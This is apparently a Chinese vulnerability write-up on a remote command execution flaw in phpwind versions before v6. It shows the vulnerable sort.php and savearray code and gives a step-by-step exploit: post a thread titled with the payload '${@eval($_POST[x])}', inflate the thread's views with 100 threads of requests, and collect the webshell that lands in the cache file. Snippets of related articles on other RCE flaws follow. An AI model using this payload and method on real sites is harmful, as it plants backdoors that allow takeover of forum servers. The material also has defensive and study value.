phpwind < v6 版本命令执行漏洞

phpwind/sort.php 会定期每天处理一次帖子的浏览量、回复量、精华版排序

代码直接使用savearray将数据库查询出来的内容写入php文件,savearray出来的参数,都使用"双引号来包含,所以可以利用变量来执行任意命令

elseif($action==‘article‘){

	[email protected](D_P."data/bbscache/article_sort.php");

	if(!$per || $timestamp-$cachetime>$per*3600){

		$_SORTDB=$_sort=array();

		$query=$db->query("SELECT t.tid,t.subject,t.replies,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck=‘1‘ AND t.locked<‘2‘ AND f.password=‘‘ AND f.allowvisit=‘‘ AND f.f_type<>‘hidden‘ ORDER BY t.replies DESC LIMIT $cachenum");

		while($topic=$db->fetch_array($query)){

			if($topic[‘replies‘]){

				$topic[‘subject‘]=substrs($topic[‘subject‘],25);

				$_sort[]=$topic;

			}

		}

		$_SORTDB[‘reply‘]=$_sort;

		$_sort=array();

		$query=$db->query("SELECT t.tid,t.subject,t.hits,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck=‘1‘ AND t.locked<‘2‘ AND f.password=‘‘ AND f.allowvisit=‘‘ AND f.f_type<>‘hidden‘ ORDER BY t.hits DESC LIMIT $cachenum");

		while($topic=$db->fetch_array($query)){

			if($topic[‘hits‘]){

				$topic[‘subject‘]=substrs($topic[‘subject‘],25);

				$_sort[]=$topic;

			}

		}

		$_SORTDB[‘hit‘]=$_sort;

		$_sort=array();

		$query=$db->query("SELECT t.tid,t.subject,t.digest,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.digest<>‘0‘ AND t.ifcheck=‘1‘ AND t.locked<‘2‘ AND f.password=‘‘ AND f.allowvisit=‘‘ AND f.f_type<>‘hidden‘  ORDER BY t.lastpost DESC LIMIT $cachenum");

		while($topic=$db->fetch_array($query)){

			$topic[‘subject‘]=substrs($topic[‘subject‘],25);

			$_sort[]=$topic;

		}

		$_SORTDB[‘digest‘]=$_sort;

		$ARTICLEDB=savearray(‘_ARTICLEDB‘,$_SORTDB);

		writeover(D_P.‘data/bbscache/article_sort.php‘,"<?php\r\n".$ARTICLEDB.‘?>‘);

	}

  

发表一个帖子:标题如下

code 区域

${@eval($_POST[x])}XXXX

再开一个多线程(100线程,几分钟就可以了),请求访问那个帖子,直到帖子的访问量排入前20

function savearray($name,$array){

	$arraydb="\$$name=array(\r\n\t\t";

	foreach($array as $key=>$value){

		$arraydb.="‘".$key."‘=>\narray(\r\n\t\t\t";

		foreach($value as $value1){

			$arraydb.=‘array(‘;

			foreach($value1 as $value2){

				$arraydb.=‘"‘.addslashes($value2).‘",‘;

			}

			$arraydb.="),\r\n\t\t\t";

		}

		$arraydb.="),\r\n\t\t";

	}

	$arraydb.=");\r\n";

	return $arraydb;

  

二天,生成统计排行的时候,shell就躺在了 /data/bbscache/article_sort.php

三个白帽实际演示:http://**.**.**.**/data/bbscache/article_sort.php

漏洞证明:

/data/bbscache/article_sort.php

<?php

$_ARTICLEDB=array(

		‘reply‘=>

array(

			array("1","${@eval($_POST[x])}XXXX ..","5732","2",),

			array("10","DDDDDDDDDDDDDDDDD","20","2",),

			array("7","HI Everybody (  b)?","8","2",),

			array("3","hello","5","2",),

			array("5","??","3","2",),

			array("2","test","3","2",),

			array("9","AAAAAAAAAAAAA","2","2",),

			array("6","?А?,"1","2",),

			array("8","??萾?,"1","2",),

			),

		‘hit‘=>

array(

			array("1","${@eval($_POST[x])}XXXX ..","11382","2",),

			array("2","test","3235","2",),

			array("3","hello","985","2",),

			array("5","??","331","2",),

			array("7","HI Everybody (  b)?","123","2",),

  

时间: 2024-10-27 13:30:28

phpwind < v6 版本命令执行漏洞的相关文章

Samba 4.x.x全版本存在命令执行漏洞

Samba 4.0.0到4.1.10版本的nmbd(the NetBIOS name services daemon)被发现存在远程命令执行漏洞.CVE编号为CVE-2014-3560.目前官方已经发布最新的补丁. 下面是官方公布的漏洞概要: =========================================================== == Subject:     Remote code execution in nmbd == == CVE ID#:     CVE

泛微OA系统多版本存在命令执行漏洞

0x01漏洞描述 泛微OA办公系统是一款协调办公软件. 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限. 0x02漏洞危害 攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行. 0x03影响范围 泛微 e-cology<=9.0 0x04漏洞复现 访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下: 0x05poc 漏洞路径:/weaver/bsh.servlet.BshServlet e

由一道工控路由器固件逆向题目看命令执行漏洞

前言 2019 工控安全比赛第一场的一道固件逆向的题目,好像也比较简单,好多人都做出来了.这里就分别从静态和动态调试分析复现一下这个命令执行的洞. 赛题说明 题目给的场景倒是挺真实的:路由器在处理 tddp 协议时出现了命令注入,导致了远程命令执行.就是后面做出来的这个答案的格式咋提交都不对... 题目给了一个压缩文件,解压出来时一个 bin 文件. 使用 binwalk -Me 直接解压,得到了与一个标准的 linux 风格的文件系统: 后来知道这个固件其实就是 tp_link SR20 路由

struts2远程命令执行漏洞S2-045

Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵,漏洞评级为:高危. 漏洞详情:恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令. 风险等级:高风险. 漏洞风险:黑客通过利用漏洞可以实现远程命令执行. 影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2

ImageMagick爆高危命令执行漏洞

ImageMagick爆高危命令执行漏洞 0x01 前言 ImageMagick是一套功能强大.稳定而且开源的工具集和开发包,可以用来读.写和处理超过89种基本格式的图片文件,包括流行的TIFF.JPEG.GIF.PNG.PDF以及PhotoCD等格式.众多的网站平台都是用他渲染处理图片.可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片.该漏洞是针对在野外使用此漏洞.许多图像处理插件依赖于ImageMagick库,包括但不限于PHP的imagic

NETGEAR 系列路由器命令执行漏洞简析

NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和修复,有些人忙于利用,而我们则在复现的过程中寻找漏洞的本质. 一.漏洞简介 1.漏洞简介 2016年12月7日,NETGEAR R7000路由器在exploit-db上被爆出存在远程命令执行漏洞,随着安全研究人员的不断深入,R8000和R6400这两款路由器也被证实有同样的问题. 2016年12月1

WordPress &lt;= 4.6 命令执行漏洞(PHPMailer)复现分析

漏洞信息 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站.也可以把 WordPress 当作一个内容管理系统(CMS)来使用.WordPress 使用 PHPMailer 组件向用户发送邮件.PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害. 漏洞编号 CVE-2016-10033 影响版本 WordPress

【知道创宇404实验室】Oracle WebLogic远程命令执行漏洞预警

2019年04月17日,国家信息安全漏洞共享平台(CNVD)官方发布安全公告 http://www.cnvd.org.cn/webinfo/show/4989 称Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞,***者可利用该漏洞,可在未授权的情况下远程执行命令.随后知道创宇404实验室启动应急流程,通过分析后复现了该漏洞并确定该漏洞影响启用了wls9_async_response.war及wls-wsat.war组件的所有Weblogic版本(包括最新版本

PHP命令执行漏洞初探

PHP命令执行漏洞初探 PHP 命令执行 PHP提供如下函数用于执行外部应用程序:例如:system().shell_exec().exec().passthru() system() <?php $host = $argv[1]; system("ping ".$host); ?> 在服务端运行php.exe index.php 192.168.2.1 执行php.exe index.php "|net user"(这里的"|"符号